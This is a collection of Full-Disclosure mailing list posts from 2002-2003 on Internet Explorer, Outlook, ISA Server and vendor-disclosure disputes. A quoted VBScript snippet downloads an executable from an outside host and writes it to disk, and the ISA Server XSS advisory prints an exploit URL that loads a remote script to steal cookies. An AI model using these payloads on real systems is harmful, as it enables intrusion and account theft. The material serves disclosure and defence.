From: Birl [EMAIL PROTECTED] As compliant as they can be with the RFC, numerous emails Ive sent to both [EMAIL PROTECTED] and [EMAIL PROTECTED] have gone unanswered. And considering that they are outside of the US, I dont bother pursuing it since our government cant do much about it. Out of curiosity, what do you believe your government can do about USA based companies that do not answer mail sent to abuse and postmaster mailboxes? I'm curious, since a lot of spamfriendly ISPs in USA seem to route those exact mails to /dev/null. Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Someone hacked anti-spam database. World bouncing email
Osirusoft is not hacked, all indications simply point at Joe being tired of having an outdated DNSBL list . Letting every single query return a positive, labelling everything as listed, is the perfect way to get the needed attention, especially since most Osirusoft users have been unaware of the ongoing DDos attack. This is old news in news.admin.net-abuse.email and news.admin.net-abuse.blocklisting. No hacks, but intentional misconfiguration. As it says, stop using relays.osirusoft.com as a DNSBL since it is outdated and can't be properly updated due to ongoing attacks from spammers. Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] ADODB.Stream object
HTML files, regardless of security zone, should not in themselves be allowed to write to the local file system or execute arbitrary commands. This is precisely the purpose of HTML Applications (HTA). Just like executing arbitrary commands through codeBase in local zones is a vulnerability that leverages system compromise, so is writing to arbitrary files from the local zone. I definitely think of this as a vulnerability of its own. Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher - Original Message - From: jelmer [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, August 26, 2003 2:55 PM Subject: [Full-Disclosure] ADODB.Stream object A few days microsoft patched an Internet Explorer Object Data Remote Execution Vulnerability found by EEYE, shortly after, HTTP-EQUIV posted some sample code on his website shortly followed by finjan (pimping their product) on bugtraq Both where kind of messy so I decided to write my own and thought I might be able to use the ADODB.Stream object to create the file on disk. unfortunatly for some weird reason this didn't quite succeed and i settled on http://ip3e83566f.speed.planet.nl/eeye.html , it is rather slow but does the trick and changing the payload is done in a matter of seconds. But anyway while playing with the ADODB.Stream object I did find that it allows writing / overwriting of files from within a simple html file when run from a location on your harddisk (and consequentially allowing execution of arbitrary code by for instance overwriting telnet and then all a telnet:// style URL) this kind of behaviour is generally only allowed from within trusted containers, such as HTA's Also it doen't set off norton antivirus's script protection here's the a code snipet that illustrates this, its been tested on IE6 on winXP : script language=vbscript const adTypeBinary = 1 const adSaveCreateOverwrite = 2 const adModeReadWrite = 3 set xmlHTTP = CreateObject(Microsoft.XMLHTTP) xmlHTTP.open GET,http://ip3e83566f.speed.planet.nl/NOTEPAD.EXE;, false xmlHTTP.send contents = xmlHTTP.responseBody Set oStr = CreateObject(ADODB.Stream) oStr.Mode = adModeReadWrite oStr.Type = adTypeBinary oStr.Open oStr.Write(contents) oStr.SaveToFile c:\\test.exe, adSaveCreateOverwrite /script I dont think it in it self can not be concidered a security vulnerabilty as it only works when the file containing the code is present on a users harddisk, though html files are generally considered trusted and you can probably trick some people into opening an html file by sending it to them through msn messenger or whatever. It can most likely be used to leverage other vulnerabilities, for instance many programs download information to predictable locations from where you might invoke it. Now invoking it from the local disk has been somewhat of a problem since IE6 sp1 as it basicly disallows access to file:/// style URL's from the internet. however there are some (rather messy) workarounds, HTTP-EQUIV posted a way of circumventing this a while back using media player 8 also i found out a long time ago that calling local files from window shares is still very much allowed and you can link to html files placed on windows shares from the internet though this is rather cumbersome to set up, other hopefully easier ways will probably pop up. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] ADODB.Stream object
From: Richard M. Smith [EMAIL PROTECTED] Agreed. However, I would go one step further. I don't think that the typical user has a need for HTML Applications and Windows Scripting Host. Both of these features along with their associated ActiveX controls should be disabled by default in Windows XP. They make writing malware too easy. HTML Applications and the Windows Scripting Host both run on the same level as ordinary executables, and opening them is no different than opening EXE files. Neither are accessible from HTML. ActiveX is, though. Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] No more windowsupdate for Windows 2000 Server Family?
Come back later, this happens randomly on all my systems ranging from 95 to 2003. Temporary glitch or a single misconfigured server in a cluster - who knows, who cares *shrug* Thor - Original Message - From: Irwan Hadi [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Sunday, August 24, 2003 10:59 AM Subject: [Full-Disclosure] No more windowsupdate for Windows 2000 Server Family? I've just visited http://windowsupdate.microsoft.com to update my Windows 2000 Server and Advanced Server, and I got this everytime I went there (with latest IE 6.0, etc. I just want to get the last IE and MDAC updates): http://v4.windowsupdate.microsoft.com/en/thanks.asp Thank you for your interest in Windows Update Windows Update is the online extension of Windows that helps you get the most out of your computer. The latest version of Windows Update is available on computers that are running Microsoft Windows 98, Windows 98 Second Edition, Windows Millennium Edition, Windows 2000 (except Windows 2000 Datacenter Server), Windows XP, and the Windows Server 2003 family. = When I tried to open windowsupdate from my Windows 2000 Professional box, it works fine. Now are the Windows 2000 server families can't use windowsupdate anymore or what? I think Microsoft should give the server families higher priority than the desktop family since if the server is down, there are more desktops can't access the things they need to do, then if one desktop is down!!! ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Administrivia: Testing Emergency Virus Filter..
From: Drew Copley [EMAIL PROTECTED] Actually, quite a few don't, some still rely on piggy backing Outlook. But, yes, this trend should be dissapearing as people upgrade so their Outlook client will no longer be able to be remote controlled by another application. (Current versions not only block attachments but also the ability for applications to access the api framework, itself). Specific parts of the API for Outlook is blocked completely (unless the enduser manually approves otherwise), which has also had an effect on existing mainstream applications such as tighly integrated antispam products (I had problems using my favorite, www.spamfighter.com). Precisely because of this, several solutions were devised almost immediately to circumvent these restrictions by proxying through thirdparty COM objects such as Redemption ( http://www.dimastr.com/redemption/ ) so one could still reach the entire Outlook object model. Outlook Redemption works around limitations imposed by the Outlook Security Patch and Service Pack 2 of MS Office 2000 and Office XP (which includes Security Patch) plus provides a number of functions to work with properties and functionality not exposed through the Outlook object model. I like Redemption, not as much for its ability to circumvent the complete API block but for its utility functions which come quite handy when developing Outlook extensions :) Even if email clients do start encrypting this information, it will still be easy to bypass because it is local. There is always a crack for local work. But, such a thing may deter some virus writers. 99% of virus writers would have problems understanding the concept of Redemption. I'm still amazed at how many virii rely on enduser interaction when they clearly need not to. Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Administrivia: Testing Emergency Virus Filter..
From: Len Rose [EMAIL PROTECTED] Enough is Enough.. When will people STOP USING MICRO$OFT WINDOWS. You mean, when will people stop executing unknown attachments? The problem with virii such as this is not the software but the wetware - the bewildered enduser who fails to use his machine in a secure manner responsible to his community. Thor ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Off-Topic: Defcon Meeting?
From: Daniel Berg [EMAIL PROTECTED] a little off-topic maybe, but is anyone here going to Defcon this year? I know I sure am, just look for the curlyhaired danish guy coming in from the cannonball run wrapped in a danish flag accompagnied by an italian Godfather and the living remains of a motorcycle accident. If you spot me, the first few beers are on me ;) Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Microsoft ISA Server HTTP error handler XSS (TL#007)
Thor Larholm security advisory TL#006 - 16 July 2003 HTML format: http://pivx.com/larholm/adv/TL006 Topic: ISA Server HTTP error handler XSS. Discovery date: 25 June 2002. Severity: Medium Affected applications: -- Any Microsoft Internet Security and Acceleration (ISA) Server installation that hosts the default HTTP error pages. This includes: ISA Server 2000 Impact: --- Stealing cookies from any ISA-protected site, cross-site scripting to any ISA-protected site, hijacking Hotmail and Passport accounts, elevating priveleges through ActiveX components, hijacking the MSN Messenger client, etc. Introduction: - CrossSiteScripting is a term that describes the injection of script code on foreign sites. A very likely scenario is where a malicious programmer would inject code on e.g. hotmail.com to steal a victims cookies, allowing him/her to hijack the victims email account. The default installation of ISA Server is suspectible to such a XSS error. Discussion: --- Every time ISA Server encounters a HTTP errorcode such as 404 Not Found or 500 Internal Server Error, ISA Server returns a HTTP error handler document which is an HTML file. These HTML files use scripting to output a link to the SERVER.TLD part of the URL, and by crafting a specially formed URL it is possible to include arbitrary script commands on the HTTP error handler document, thereby enabling CrossSiteScripting on any ISA-protected site. Unlike TL001 we will prefer to trigger a 500 Internal Server error instead of a 404 Not Found error, as the HTTP 500 error handler document can easily be lured out of ISA Server by appending %U0 to the querystring, resulting in an unparsable request. Many other requests can result in ISA Server handing out an HTTP error handler document. If we look at 404.htm or 500.htm we will notice a particular line of code: document.write( 'A HREF=' + escape(urlresult) + '' + displayresult + /a); displayResult is derived from the first instance of :// in the URL until the next instance of /. This means that we will have to include our script code before the path part of the URL. To accomplish this we include our script code in the Basic Authentication part of the URL, but we first have to escape any special characters in the code. Any / character will end displayresult prematurely and any spaces will corrupt the DNS lookup, and we therefor replace any space with a TAB (%09) and any / with %5Cx2f (\x2f, as we will dynamically reference an external file). Exploit: http://img%09src=%09onerror=document.scripts[0].src=%27http%5Cx3a%5Cx2f% 5Cx2f jscript.dk%5Cx2ftest.js%27;[EMAIL PROTECTED]/%U0 The above will include and execute http://jscript.dk/test.js on YOUR.TLD, provided that YOUR.TLD is protected by an ISA Server installation. Solution: - Apply the MS03-028 patch. You could also use the opportunity to make yourself some nice custom error handler documents. History: 25 June 2003: Discovery 27 June 2003: Notification to MS with complete advisory 28 June 2003: Reply from MS: This has actually been reported to us by another finder a few weeks ago. We're nearing a release of a bulletin crediting the finder and a patch. 16 July 2003: MS03-028 patch released by MS, no credit for discovery 16 July 2003: Public advisory Demonstration: -- I have put together some proof-of-concept examples: Simple static examples - your cookies from a selection of domains: http://pivx.com/larholm/adv/TL006/simple.html Short advanced example - get the cookies from any ISA-protected site: http://pivx.com/larholm/adv/TL006/advanced.html References: --- MS03-028 patch http://www.microsoft.com/technet/security/bulletin/MS03-028.asp TL001 IIS allows universal CrossSite Scripting: - http://www.pivx.com/larholm/adv/TL001/ CERT Cross Site Scripting advisory: - http://www.cert.org/advisories/CA-2000-02.html Unpatched IE vulnerabilities: - http://pivx.com/larholm/unpatched/ Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] how do they do it???
From: [EMAIL PROTECTED] http://www.albinoblacksheep.com/text/cupholder.php how do you think they do it in PHP? Thank you for confirming that you have NOT installed the MS03-021 patch [1] for Windows Media Player, which among others removes the ability to eject CD drives using the WMP ActiveX control. I can now safely assume that you are vulnerable to several vulnerabilities. Do you want an HTML email? ;) [1] http://www.microsoft.com/technet/security/bulletin/ms03-021.asp Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] how do they do it???
From: morning_wood [EMAIL PROTECTED] Replies like this are realy not need are they??? MrSecurity Reseacher? I suppose i should lament you on your deficencies, btw I dont have the patch installed either... by choice. Dont ass-u-me as we all know what that makes you look like. Wow, people are sure in a temper today. I guess danish irony is not easily understood (same thing happened to Knud). In case you didn't notice, I was hinting to the list and zorkshin that this 'functionality' has in fact been removed now. Thor ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] The incredible intolerance of Knud
From: Ulf Harnhammar [EMAIL PROTECTED] I strongly object to people using terms of sexual orientation as a put-down. I think Knud was just being ironic, and besides we do that a lot in Denmark. The people who are worst at it are some of the most gay people I know, just like my turkish friends can tell some quite harsh immigration jokes. No harm intended and all.. FWIW, the antivirus companies have classified my phpBB exploit from earlier this year as a virus as well. I've gotten quite a few bounces about that from people who have that Bugtraq post in some mail folder, and who just upgraded their antivirus software. I still get bounces on several advisories where AV vendors labelled my example code as a virus. We all know that AV vendors are happy to treat the symptom instead of fixing the problem, so what? Thor ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Right-wing computer virus
From: Richard M. Smith [EMAIL PROTECTED] snip http://lists.netsys.com/pipermail/full-disclosure/2003-July/010947.html I receive minimum a hundred vira a day, each with completely different subject lines, body text and attachment filenames. As Fitzgerald, I fail to see the relevance - from your description it does not sound like the virus has anything new to present or if it is even a new virus. Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Internet Explorer 6 DoS Bug
Positively confirmed on 6.0.2800.1106.xpsp2.030422-1633 when entering C:\aux in the Address Bar. Seeing as the behavior of this scenario is inconsistent between list subscribers with the same IE version, one could believe the bug is not in IE but in urlmon or shellexecute somewhere. Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher - Original Message - From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Monday, July 07, 2003 6:25 PM Subject: [Full-Disclosure] Internet Explorer 6 DoS Bug Hi, I found a bug in IE6 ón Windows XP with all Service Packs and Patches installed: If you enter C:\aux in the adressline of the IE (not EXPLORER, InternetExplorer) and hit enter, the window will freeze. This bug is simmilar to C:\con\con but not as dagerous. But its the same reason, naimly that windows trys to open aux, a hardware device in earlier windows versions. I already sended an email to Microsoft but they said the bug wouldn't exist. Bye Fabian Becker (www.neonomicus.ionichost.com) [EMAIL PROTECTED] Mehr Power für Ihre eMail - mit den neuen Leistungspaketen bei http://www.epost.de ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] CD-ROM drive opens
From: Thor Larholm [EMAIL PROTECTED] Windows Media Player exposes several objects and methods to scripting through a safe-for-scripting, signed ActiveX control. Among those objects are the CD drive objects, which each have an Eject method. This is documented functionality in WMP, if you want to you can easily push the drive in and out in a constant cycle. If you don't like the features then don't use the product :) I remember people asking questions about ejecting CD drives back in 2000, and remember putting up an example in early 2001 ( http://jscript.dk/2001/3/cdrom.jpg ). Though undocumented currently, I can now confirm that Microsoft has removed this functionality through the recently released MS03-021 bulletin. http://www.microsoft.com/technet/security/bulletin/MS03-021.asp MS03-021 fixes a vulnerability found by jelmer, as well as removing the ability to eject CD drives from webpages. Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] CD-ROM drive opens
From: Treu, Jill [EMAIL PROTECTED] Perhaps this could be the issue causing the CD-ROM drive to open? W32/Magold-D is a memory resident worm that uses email, IRC channels, network shared drives and P2P network shares to spread. It is not a virus, the original poster even included the source code in question. Windows Media Player exposes several objects and methods to scripting through a safe-for-scripting, signed ActiveX control. Among those objects are the CD drive objects, which each have an Eject method. This is documented functionality in WMP, if you want to you can easily push the drive in and out in a constant cycle. If you don't like the features then don't use the product :) I remember people asking questions about ejecting CD drives back in 2000, and remember putting up an example in early 2001 ( http://jscript.dk/2001/3/cdrom.jpg ). Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] O UTLO OK EXP RE SS 6 .00 : broken
Outlook Express is not the only vulnerable product. The culprit here is the codebase localPath vulnerability which was patched in Internet Explorer by MS02-015 in March 2002. GreyMagic had more fun with this at http://security.greymagic.com/adv/gm001-ie/ which is also the origin of the example displayed. MS02-015 crippled codeBase quite severely in Internet Explorer, completely removing most of its functionality in the Internet Zone. It is still possible to use this vulnerability in Internet Explorer in any local security zone, but getting to that zone in the first place is in itself an obstacle. Whatever Microsoft patched in MS02-015 (crippling codeBase in the Internet Zone to avoid the command execution vulnerability) was only applied to the IE-specific parts of MSHTML and not to any shared parts that thirdparty programs such as Outlook and Outlook Express utilize. This despite our impression that MS02-015 removed the problem. This is apparent if you examine Outlook 2000 which can also execute arbitrary commands automatically upon reading mails if you have set the security zone to the Internet Zone - just like Outlook Express as displayed by http-equiv The default security zone for Outlook 2000 is the Internet Zone. It is first after you apply Office 2000 Service Pack 3 that the default zone is changed to the Restricted zone, so remember either to apply O2KSP3 or manually change your zone settings to Restricted at your earliest convenience. Does Eudora still use the Internet Zone for viewing HTML mail? If so, it is also still vulnerable to the codeBase command execution vulnerability, like any other application that is embedding MSHTML. Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher Latest PivX research: Multi-Vendor Unreal Engine Advisory http://www.pivx.com/press_releases/ueng-adv_pr.html - Original Message - From: [EMAIL PROTECTED] [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Saturday, February 22, 2003 4:36 PM Subject: O UT LO OK E XPRE SS 6 .00 : broken Saturday, February 22, 2003 Technical silent delivery and installation of an executable no client input other than reading an email or viewing a newsgroup message. Outlook Express 6.00 SP1 Cumulative Pack 1 2 3 4 whatever. Rest of original http-equiv post at http://www.ntbugtraq.com/default.asp?pid=36sid=1A2=ind0302L=ntbugtraqF=P S=P=5888 The rest was snipped to avoid barking from premenstrual antivirus scanners. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Epic Games threatens to sue security researchers
On February 5th, Luigi Auriemma of PivX Solutions released a tightly packed advisory detailing multiple vulnerabilities in the Unreal network gaming engine developed by Epic Games. These vulnerabilities affect both clients and servers who are playing the plethora of games that are using the engine, and has been readily exploitable for 5 years. The press release: http://www.pivx.com/press_releases/ueng-adv_pr.html The advisory itself: http://www.pivx.com/luigi/adv/ueng-adv.txt Following both industry and personal standards, PivX gave Epic Games a duration of 30 days to (at the very least) respond to our private notification to them. After nothing had happened during that month we prepared to release the advisory, yet once the press asked Epic Games for comments they were suddenly very responsive. Promises to work closely with us on the vulnerability and advisory were made and we managed to hold down the press for several months after this. 60 days passed after this, without any collaberation, honest effort or actual contact from Epic Games. We released the advisory after 90 days had passed from the original vendor notification. 90 days, in which we were played like fools, in which Epic Games had ample time and sufficient opportunity to react and work with us on a coordinated release. 90 days in which Epic Games, from the best of our comprehension, had archived our communications in the thrash, during which we received no serious communication except for crisis handling at the originally planned release time. On February 6th, BluesNews (among many others) could cite a quote from Mark Rein, Epic Games Vice President: I won't sugar coat this. We f***ed up on this. Yes this is real and yes this was brought to our attention and yes we should have fixed it by now. http://www.bluesnews.com/cgi-bin/board.pl?action=viewthreadthreadid=39954 On February 11th the tides have changed, and TechTV are reporting public legal threats from that same person: This is slanderous, he says. They've taken this too far. We're getting our lawyers involved with this. http://www.techtv.com/news/security/story/0,24195,3417248,00.html I fail to see how Mark Rein on one hand can publicly announce this to be a real threat that they should have fixed earlier, and on the other hand can announce the advisory to be false and malicious statements. There is no slander or libel in any aspect of this, and the only imaginable outcome that Mark Rein must have been aiming for by his declaration of layer involvement is to silence future security research on Epic Games products through the promise of unfounded barratry. As we know from precedents in the past, this approach to security is counterproductive at best and encouraging for underground security research at worst, and I can only hope for an official retraction of this policy by Epic Games once other employees have had half a minute to think about the implications and example that Mark Rein is setting forth. In the past, I have received better nonresponsive treatment by Microsoft when their security handling was at its worst. Contrary to the vast improvements that Microsoft has gone through over the last year and a half, Epic Games did not even start to acknowledge the problem properly before a full public disclosure had been made on February 5th. I believe that Luigi, and all of PivX, has handled this issue in a courteous, proffessional and ethical manner, and the uncoordinated release that was its outcome stems from a direct result of a nonresponsive vendor that at best is plainly ignorant and at worst acts directly against the best interest and security of its own customers. Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher Latest PivX research: Multi-Vendor Unreal Engine Advisory http://www.pivx.com/press_releases/ueng-adv_pr.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Fw: Epic Games threatens to sue security researchers
- Original Message - From: Mark Rein [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, February 11, 2003 8:31 PM Subject: Re: Epic Games threatens to sue security researchers In-Reply-To: 01ce01c2d1f1$1beebef0$[EMAIL PROTECTED] Thor, I have sent your company an apology for those completely unfortunate comments that I sincerely regret. We did provide an official statement and I was not, at the time, aware that my verbal reaction, in a moment of shock and surprise, was being captured for the article. The comment was a complete over-reaction to seeing the list of games including future games that have not yet been published. It had nothing to do with the security issues themselves, the validity of the report, or the way Pivx presented it to us. Pivx gave us more than fair enough warning of the bugs and we simply failed to fix them in the allotted time. We released a statement last week to the Unreal community indicating that we fucked up in not addressing these concerns within the given time and that we were already testing a patch with the security issues corrected. In addition the official statement we gave pointed out that we were fixing the holes and that the Pivx report was fair and accurate. Licensees were already provided with the source code for the security fixes. Again this was a moment-of-stupidity reaction and I sincerely apologize to Pivx and the entire security community. Epic has already stated that we will take these matters far more seriously in the future. Mark Rein, Epic Games Inc. Visit us at http://www.epicgames.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Fw: TRACE used to increase the dangerous of XSS.
- Original Message - From: Thor Larholm [EMAIL PROTECTED] To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Thursday, January 23, 2003 10:10 AM Subject: RE: TRACE used to increase the dangerous of XSS. I just finished reading this so-called whitepaper and the press release, and all I can say is hyped, sensationalised snakeoil. The HttpOnly cookie feature, a proprietary Microsoft extension designed to mitigate a single aspect of XSS, can be circumvented in myriads of ways. In fact, reading the HTTP response in any other way than through the document.cookie property immediately exposed through JS will return the cookie to you. Calling from JS to a Java applet that in turn parses a HTTP response, using a Flash movie (or most any other plugin) or even needlessly complicating matters by parsing the BODY of a TRACE response received through XMLHTTP - such as this 'whitepaper' suggests. By design, HttpOnly makes the cookie available only through the HTTP headers - which, among many others, the XMLHTTP control can read. What we end up with from WhiteHat Security is a way to circumvent the HttpOnly cookie feature in IE6SP1, nothing else. In itself, worthy of a note in a roundup of browser problems or a comment in a reply to the posting announcing the HttpOnly feature on Bugtraq - but hardly a whitepaper, pressrelease and blurbs such as comparing this to Code Red and Nimda or calling this a flaw in all web servers worldwide. This is simply not a new class of web-app-sec attack or a flaw in TRACE, as hyped by WhiteHat Security. System administrators should most definitely not waste their precious time on implementing the silly workarounds suggested, such as disabling TRACE/TRACK requests. The one, and only, impact the discovery from WhiteHat Security has is that it re-enables cookie reading from JS despite if you had already cared to specifically alter your webapplication to accomodate this. All the boojah and fuss about not requiring an actual XSS in the webapplication or being able to impose XSS on arbitrary foreign domains, factors that would indeed be a cause of concern, is utterly and completely unrelated to the findings of WhiteHat Security. These are mere demonstrations of already publicly known unpatched vulnerabilities in Internet Explorer ( of which there are currently 19 - http://www.pivx.com/larholm/unpatched/ ). WhiteHat Security paired a minor low-impact notice of their own with existing proof-of-concept code from several critical high-impact vulnerabilities discovered, and long disclosed, by thirdparty researchers, dubbed it their own and wrote up a fancy press release filled with inaccuracies announcing a indifferent 'whitepaper' scathered with obscure irrelevancies. In short, snakeoil. Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher Latest PivX research: Multi-vendor Game Server DDoS Vulnerability http://www.pivx.com/press_releases/mk_mk001.html -Original Message- From: Jeremiah Grossman [mailto:[EMAIL PROTECTED]] Sent: 22. januar 2003 21:33 To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: TRACE used to increase the dangerous of XSS. WhiteHat Security has released a new white paper discussing a new class of web-app-sec attack (XST) which potentially affects all web servers supporting TRACE. The white paper explains all the detailed technical results we have found so far. We are fairly certain this particular issue will spark much debate and encourage those interested to read and comment. White Paper Mirrors: http://www.betanews.com/whitehat/WH-WhitePaper_XST_ebook.pdf http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf http://www.boarder.org/WH-WhitePaper_XST_ebook.pdf http://www.forumgalaxy.com/whmirror/WhitePaper_screen.pdf Press Release http://www.whitehatsec.com/press_releases/WH-PR-20030120.txt ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: New Web Vulnerability - Cross-Site Tracing
From: H D Moore [EMAIL PROTECTED] Although its definately an interesting way to compromise client-side headers, the root is the vulnerability is the XMLHTTP component's ability to act like a HTTP proxy. Client-side scripting components should only be allowed to interact with the site which served them up, otherwise you open a huge can of worms, where XSS and user-credential theft are only the squishy little ones on top. Isn't it great then to realize that XMLHTTP, in fact, can only interact with the site which served them - exactly as you desire? The proxy features and XSS to arbitrary foreign sites examples that are demonstrated in this 'whitepaper' are merely demonstrations of already publicly known unpatched vulnerabilities in IE. They have nothing to do with any of the findings presented. http://jscript.dk/2003/1/sec/xst-reply.txt Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher Latest PivX research: Multi-vendor Game Server DDoS Vulnerability http://www.pivx.com/press_releases/mk_mk001.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Fw: reply
Hi Lel, Put a lid on it and yell at the moon. I fart in the general direction of your measely attempt of a SLAPP. FD list: This is the guy we discussed some months ago, who wanted help in taking the cached copies of his criminal records off Google: http://lists.netsys.com/pipermail/full-disclosure/2002-September/001816.html Apparently, now he wants the above taken down. Did anyone else get recent threats from this nutcase? :) /Thor - Original Message - From: Lel Peto [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Friday, November 15, 2002 2:43 AM Subject: reply Mr. Larholm, After consulting attorneys here and in Denmark, please know that you are placing yourself and the institution from which you sent your reply messages to me in exposure to a multi million dollar Defamation civil law suit by placing your statement on Google. I have no malice towards you. I am in the process of repaying the funds in full that I owe leading to a potential final resolution. Surely you are not familiar with my case and the oil industry. I simply ask you to please remove your statement about me off the google search mechanism and the web which you have placed. If so, this matter shall be closed. Thank you, Lel Peto _ STOP MORE SPAM with the new MSN 8 and get 2 months FREE* http://join.msn.com/?page=features/junkmail ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] ZDnet forum: IE formatting local drive
It's a copy of the advisory from Sandblad, with a few bits changed. http://online.securityfocus.com/archive/1/298924/2002-11-02/2002-11-08/1 http://online.securityfocus.com/archive/1/299094/2002-11-02/2002-11-08/1 http://online.securityfocus.com/archive/1/299330/2002-11-09/2002-11-15/1 http://online.securityfocus.com/archive/1/299230/2002-11-09/2002-11-15/1 Why is this even surprising people? For ages, you have been able to plant a file on the users machine, locate its location, jump to a local security zone and then execute the file. Sure, you skip 2 steps by using the HTMLHelp Control, but the impact is the same - running arbitrary code. Regards Thor Larholm, Security Researcher PivX Solutions, LLC Are You Secure? http://www.PivX.com - Original Message - From: Alan Rouse [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Monday, November 11, 2002 7:29 PM Subject: [Full-Disclosure] ZDnet forum: IE formatting local drive Format a local drive by visiting a URL from a fully patched Windows / IE platform. This appeared last night: http://forums.zdnet.com/group/zd.Security.Virus.Alerts/community/communi ty.tpt/@thread@33885@F@1@D-,D@ALL/@article@mark@33885?EXP=ALLVWM=ROS= OC=75 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] 60 Poot ze-a cheekee in de-a oofee!
As discussed to death in the past couple of weeks, if you don't like the messages, see procmail(1) and procmailrc(5). From http://lists.netsys.com/full-disclosure-charter.html : It is expected that the list will be largely self-policing, however in special circumstances (eg spamming, misappropriation) then offending members may be removed from the list by the management. The above seems like a much simpler, centralized solution. Thor Larholm URL: http://www.jibbering.com/faq/ FAQ for comp.lang.javascript URL: http://jscript.dk/unpatched/ Unpatched IE vulnerabilities ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Mozilla vulnerabilities, an update
On September 9th I wrote the following to [EMAIL PROTECTED] -- START -- I noticed that you have published a list ( http://mozilla.org/releases/mozilla1.0.1/security-fixes-1.0.1.html ) of security issues that have been fixed in Mozilla 1.0.1 I would recommend posting this list to the Bugtraq mailinglist, [EMAIL PROTECTED], so that the secinfo industry and the public in general becomes aware of these. This would help raise the awareness of your security efforts, as well as urge users of older versions to upgrade and provide hints to other software products that embed Gecko, or other parts of Mozilla, that they should consider getting fresh sources for their projects. In case you feel that this is not a necessary action, I would like to personally make the list aware of these security fixes in a matter of 5 working days. -- END -- At first I received a reply from Asa Dotzler, which among others mentioned that the list was far from comprehensive and It would be much better if someone (mitch) updated the real page at http://www.mozilla.org/projects/security/known-vulnerabilities.html; So I forwarded and wrote to Mitch: May I recommend updating the official list of known vulnerabilities in Mozilla to include the vulnerabilities that have been fixed, such as XMLHTTP and the many on Asas list? And received a short reply last thursday: Yes, that page will be updated soon. Thanks for letting me know. Since nothing has happened, I thought I would pass this on to the list. This is a short list of issues fixed between the 1.0 and 1.0.1 version of Mozilla. As Asa mentioned, this list was just put together from some queries on Bugzilla. Undoubtedly, there will be many more vulnerabilities that have been fixed, and it would be a welcome change to let the public know about these. BUG ID Product Component Summary 88183 Browser Plug-ins navigator.plugins leaks path names 104472 Browser Security execution of scripts in the file: protocol from XUL using 